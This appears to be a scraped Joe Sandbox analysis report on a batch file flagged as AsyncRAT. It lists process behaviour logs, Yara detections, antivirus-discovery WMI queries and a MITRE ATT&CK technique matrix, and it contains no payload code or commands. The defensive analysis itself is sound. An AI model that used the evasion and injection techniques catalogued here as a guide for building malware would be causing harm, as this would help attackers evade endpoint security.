Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966491660.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966443638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.000001696616A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4165262476.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.000001696643C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 7440, type: MEMORYSTR

Source: powershell.exe, 00000003.00000002.2142358779.000002D0E8B1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :Wed, 04 Oct 2023 10:53:51 GMTr\MsMpeng.exe
Source: powershell.exe, 00000003.00000002.2150616469.000002D0EAB50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2150967102.000002D0EAC65000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2150967102.000002D0EACCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	112 Scripting	Valid Accounts	21 Windows Management Instrumentation	112 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	211 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Obfuscated Files or Information	Security Account Manager	131 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	41 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 27#U0646.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: AsyncRAT

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
27#U0646.bat